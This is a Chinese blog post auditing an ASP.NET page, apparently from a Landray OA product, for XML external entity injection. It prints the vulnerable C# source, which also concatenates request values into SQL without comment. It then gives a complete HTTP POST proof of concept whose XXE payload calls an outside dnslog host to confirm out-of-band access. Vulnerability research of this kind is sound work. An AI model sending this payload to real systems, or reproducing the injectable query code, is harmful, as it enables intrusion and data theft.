ASP.NET代码审计 XXE漏洞(XML外部实体注入)

最新推荐文章于 2025-08-02 22:34:55 发布
最新推荐文章于 2025-08-02 22:34:55 发布
阅读量195 收藏
点赞数 1
CC 4.0 BY-SA版权
文章标签: xml
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77012231/article/details/149330866

全局搜索

xmlDocument.Load

FI_DealWith.cs代码

using System;
using System.Data;
using System.Text;
using System.Web.UI;
using System.Xml;
using Landray.DataAccess;
using LEOA.Core.BusinessRules.Organization;

namespace Landray.UI.Common;

public class FI_DealWith : Page
{
	private void Page_Load(object sender, EventArgs e)
	{
		StringBuilder stringBuilder = new StringBuilder();
		XmlDocument xmlDocument = new XmlDocument();
		xmlDocument.Load(base.Request.InputStream);
		XmlNode xmlNode = xmlDocument.SelectSingleNode("//root/prms");
		string value = xmlNode.Attributes["name"].Value;
		switch (value.ToLower())
		{
		case "identity":
		{
			string value2 = xmlNode.Attributes["id"].Value;
			string value3 = xmlNode.Attributes["tablename"].Value;
			string text = ((xmlNode.Attributes["columnname"] == null) ? "" : xmlNode.Attributes["columnname"].Value);
			string value4 = ((xmlNode.Attributes["columnvalue"] == null) ? "" : xmlNode.Attributes["columnvalue"].Value);
			string text2 = ((xmlNode.Attributes["columndesc"] == null) ? "" : xmlNode.Attributes["columndesc"].Value);
			string text3 = ((xmlNode.Attributes["region"] == null) ? "" : xmlNode.Attributes["region"].Value);
			if (text.Equals(""))
			{
				stringBuilder.Append(" SELECT * FROM ").Append(value3).Append(" WHERE id<>")
					.Append(value2);
			}
			else
			{
				stringBuilder.Append(" SELECT * FROM ").Append(value3).Append(" WHERE ")
					.Append(text)
					.Append("=N'")
					.Append(value4)
					.Append("' AND isnull(" + text + ",'')<>'' ")
					.Append(" AND id<>")
					.Append(value2);
			}
			if (text3.ToLower().Equals("org"))
			{
				stringBuilder.Append(" AND org_id=").Append(((Org)Session["Org"]).ID);
			}
			else
			{
				stringBuilder.Append(text3);
			}
			DataRow dataRow = DataAccess.GetDataRow(stringBuilder.ToString());
			if (null != dataRow)
			{
				base.Response.Write("[" + text2 + "]重复!");
			}
			break;
		}
		case "dataxml":
			stringBuilder.Append("SELECT ").Append(xmlNode.Attributes["columns"].Value).Append(" FROM ")
				.Append(xmlNode.Attributes["tablename"].Value)
				.Append(" WHERE ")
				.Append(xmlNode.Attributes["conditions"].Value);
			base.Response.Write("ok:" + DataAccess.GetDataXml(stringBuilder.ToString()).ToString());
			break;
		}
	}

	protected override void OnInit(EventArgs e)
	{
		InitializeComponent();
		base.OnInit(e);
	}

	private void InitializeComponent()
	{
		base.Load += Page_Load;
	}
}

关键代码

 

 xmlDocument.Load(base.Request.InputStream);直接接收用户传入的HTTP流数中读取XML格式的数据

base.Request.InputStream
从当前HTTP请求的输入流(Request.InputStream)中读取XML格式的数据。

这里使用dnslog平台来证明可以调用远程的XML文件

POC

POST /common/FI_DealWith.aspx HTTP/1.1
Host: 
Cookie: .ASPXAUTH=5499FDD5EA2D1631ED228ED073CA724963EB46EBF16D9832B5A9722071A023DF220E0D305A8B8719C514E1FE22D3B5B9FC4448A0728FE8F84DBFE1CC3FBC1C01C62CD77F11FD21FAD65C5AD9BD8B3ADFCC8C6C9852BAD696E7DC76D277F90DDE4955258F0FF923C7E2F3E67DC4F7D1D7F08550F6
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://kx4mci.dnslog.cn">
%remote;]>
<root/>

 成功外带

常见Web安全漏洞
weixin_45253622的博客
03-07 1万+
常见Web漏洞小结 1越权漏洞 不同权限账户之间的存在越权访问 检测 抓去a用户功能链接,然后登录b用户对此链接进行访问 抓去a用户功能链接,修改id为b的id,查看是否能看b的相关数据 替换不同的cookie进行测试查看 防范 1服务器端必须对每个页面链接进行权限判断。 2用户登陆后,服务器端不应再以客户端提交的用户身份信息为依据,而应以会话中服务端保存的已登陆的用户身份信息为准。 3页面提交的资源标志与已登陆的用户身份进行匹配比对,然后判断其对当前链接是否有权限。 4必须在服务器端对每个请求URL进行鉴
常见漏洞知识库(原理/场景/修复)
lefooter的博客
04-30 6418
SQL 注入 0x01 漏洞描述 SQL注入漏洞产生的原因是网站应用程序在编写时未对用户提交至服务器的数据进行合法性校验(类型、长度、业务参数合法性等),同时没有对用户输入数据进行有效地特殊字符过滤,使得用户的输入直接带入数据库执行,超出了SQL语句原来设计的预期结果,导致了SQL注入漏洞。 0x02 常见应用场景 SQL注入漏洞可能出现在一切与数据库交互的地方,比如常见的查询用户信息、查询订单信...
.NET代码审计】- XXE漏洞
m0_52923241的博客
10-25 343
以下总结了在.NET中处理 XML 的常用方法和防止外部实体注入的措施。
(渗透学习)XXE漏洞原理 & 挖掘 & 利用 & 防御
yang1234567898的博客
01-15 6255
1、什么是XMLxml和html结构类似,不同的是: XML 被设计用来传输和存储数据。 HTML 被设计用来显示数据。 XML 文档结构包括 XML 声明、DTD 文档类型定义(可选)、文档元素 (1)什么是DTD? 文档类型定义(DTD)可定义合法的XML文档构建模块,它使用一系列合法的元素来定义文档的结构。 DTD 可被成行地声明于 XML 文档中,也可作为一个外部引用。 ① 内部的 DOCTYPE 声明: <!DOCTYPE 根元素 [元素声明]> 如下就
JAVA代码审计与安全编码
liguangyao213的博客
02-17 648
JAVA安全编码与代码审计 java代码审计系列视频课程 概述 本文重点介绍JAVA安全编码与代码审计基础知识,会以漏洞及安全编码示例的方式介绍JAVA代码中常见Web漏洞的形成及相应的修复方案,同时对一些常见的漏洞函数进行例举。 XXE 介绍 XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。文档类型定义(DTD)的作用是定义 XML 文档的合法构建模块。DTD 可以在 XML 文档内声明,也可以外部引用。 内部声明DTD: 引用外部DTD: 当允许引用外部实体时,恶
红队专题-漏洞挖掘-代码审计
aming小老弟
03-11 1236
其中 Web A 为存在 CSRF 漏洞的网站,Web B 为攻击者构建的恶意网站,User C 为 Web A 网站的合法用户。用户 C 打开浏览器,访问受信任网站 A,输入用户名和密码请求登录网站A在用户信息通过验证后,网站 A 产生 Cookie 信息并返回给浏览器,此时用户登录网站 A 成功,可以正常发送请求到网站A用户未退出网站 A 之前,在同一浏览器中,打开一个 TAB 页访问网站 B网站 B 接收到用户请求后,返回一些攻击性代码,并发出一个请求要求访问第三方站点 A。
SQL注入、XSS、XXE、CSRF、SSRF、越权漏洞、文件上传、文件包含总结篇
m0_57379855的博客
03-23 6094
漏洞总结篇SQL注入修复过滤特殊字符修改php.in使用mysqli_real_escape_string()函数加固数据库方面加固管理方面 SQL注入 是指web应用程序对用户输入的数据的合法性没有判断或者没有严格的过滤,攻击者可以在web程序中把定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息 就是使用某种手段,在原来的SQL语句基础上,添加一段恶意的SQL语句并执行,从而达到不被管理员允许的目
代码审计[java安全编程]
霍力强的专栏
11-28 6506
SQL注入 介绍 注入攻击的本质,是程序把用户输入的数据当做代码执行。这里有两个关键条件,第一是用户能够控制输入;第二是用户输入的数据被拼接到要执行的代码中从而被执行。sql注入漏洞则是程序将用户输入数据拼接到了sql语句中,从而攻击者即可构造、改变sql语义从而进行攻击。 漏洞示例一:直接通过拼接sql @RequestMapping("/SqlInjection/{id}") public M...
学习笔记-JAVA代码审计
人饭子的博客
11-01 238
JAVA代码审计 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 相关文章 一次从内网到外网,黑盒到白盒的批量挖洞经历 java审计基础 简单java代码审计代码审计_Sylon的博客-CSDN博客_代码审计 记一次对“天猫”商城系统的漏洞挖掘 【Java 代码审计入门-01】审计前的准备 ofCMS代码审计 相关资源 ...
web安全漏洞总结
weixin_49349476的博客
07-25 4680
分析了一下漏洞造成的原因,怎么利用漏洞,怎么防御漏洞漏洞分为两个部分,常见的漏洞:sql注入、文件上传漏洞、文件包含漏洞、代码执行漏洞、命令执行漏洞、代码执行漏洞xxe、xss、csrf、ssrf漏洞、反序列化漏洞、中间件漏洞、解析漏洞、权限提升漏洞。 第二部分:敏感信息漏洞、授权访问漏洞、逻辑漏洞、未授权访问、中间件漏洞
【安全测试实操】:在ASP.NET登录注册中识别与修复安全漏洞
[【安全测试实操】:在ASP.NET登录注册中识别与修复安全漏洞](https://www.codeproject.com/KB/validation/386385/password.JPG) # 摘要 随着网络技术的发展和应用的深入,ASP.NET应用程序的安全问题日益凸显,尤其...
XML 用途
wjs2024的博客
07-31 290
XML作为一种灵活、可扩展的标记语言,在众多领域得到了广泛应用。从数据存储、Web开发到企业信息化,XML都发挥着重要作用。随着技术的不断发展,XML将继续在各个领域发挥其独特的价值。
XML Schema 杂项数据类型
lsx202406的博客
08-01 490
杂项数据类型是指那些不属于简单数据类型和复杂数据类型的 XML Schema 数据类型。这些数据类型通常用于表示特殊的数据结构或特定的数据格式。dateTime: 表示日期和时间信息。duration: 表示时间间隔。gDay: 表示一天中的日期。gMonthDay: 表示一个月中的某一天。gYearMonth: 表示一个年份和月份。gYear: 表示一个年份。ID: 表示一个唯一的标识符。IDREF: 表示一个有效的 ID 标识符。IDREFS: 表示多个有效的 ID 标识符。
MyBatis XML 配置方式是 返回 Boolean 类型
Thinking In Java
07-30 685
摘要 MyBatis 检查记录是否存在时,推荐使用 SELECT 1 ... LIMIT 1 返回 Boolean 类型,代码简洁且性能最优(自动将 1 转 true,null 转 false)。若返回 Integer,可通过 Hutool 的 ObjectUtil.isNotNull() 或 NumberUtil.equals() 安全判空和数值比较。替代方案(如 count(*))性能较差,不推荐。 关键点 最佳实践:Boolean 返回类型 + LIMIT 1 查询。 Hutool 工具:Object
Typecho博客数据迁移全指南:从数据库导出到XML导入的完整方案
独立开发者阿乐的博客
08-01 793
本文全面介绍了Typecho博客系统的文章数据导出与导入方法。首先解析了Typecho的核心数据表结构,包括typecho_contents和typecho_relationships等表的字段设计。官方导出方法可通过后台生成XML文件,操作简便但功能有限。对于技术人员,推荐使用mysqldump直接操作数据库导出文章相关表。文章还提供了基于Typecho API的自定义PHP脚本方案,实现JSON格式的灵活导出导入,包含处理文章分类、标签等元数据的完整代码示例。最后讨论了附件迁移等特殊场景的处理方案,如批
mapper.xml中的<include>是什么
casually的博客
07-31 193
它的核心作用是减少重复代码,提高 SQL 的可维护性。避免在多个 SQL 语句中重复编写相同的列名、条件或复杂逻辑。片段后,所有引用该片段的 SQL 会自动生效,无需逐个修改。,可以显著提升 MyBatis 映射文件的简洁性和可维护性。标签定义一个可复用的 SQL 片段,并为其指定唯一。片段之间没有相互引用,否则会导致解析错误。若需跨文件引用,需通过命名空间(,会覆盖外部传入的同名参数。在 MyBatis 的。
3DXML 转换为 UG 的技术指南及迪威模型网在线转换推荐
技术说明博主
07-31 1142
3DXML转换为UG的必要性与方法 3DXML格式适用于达索系统产品间的数据交换,但UG软件在参数化设计、数控编程和有限元分析等方面功能更强大。转换方法包括:1)UG部分版本直接导入3DXML文件;2)通过STEP等中间格式转换;3)使用在线平台(如迪威模型网)实现便捷转换。转换时需注意文件完整性、大小限制及模型精度,转换后应检查几何错误并进行修复优化。在线转换平台具有兼容性好、数据安全等优势,适合快速处理简单模型,而复杂模型建议采用本地软件转换以确保精度。
学习lxml库:Python XML/HTML处理利器
2401_87975790的博客
07-28 405
Python的lxml库提供了高效处理XML/HTML文档的功能,支持快速解析、元素操作、XPath/CSS选择器查询和序列化输出。主要模块包括etree(XML处理)、html(HTML处理)和cssselect(CSS选择器)。核心功能包含:字符串/文件解析、元素创建/修改、XPath查询、CSS选择器应用等。该库以高性能著称,特别适合处理大型文档,支持增量解析和表达式复用优化性能。示例展示了XML创建修改和HTML数据提取的典型用法,体现了lxml在数据处理方面的强大能力。
MyBatis 批量操作 XML 实现方式
最新发布
lizhengyu891231的博客
08-02 81
MyBatis 批量操作 XML 实现方式
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值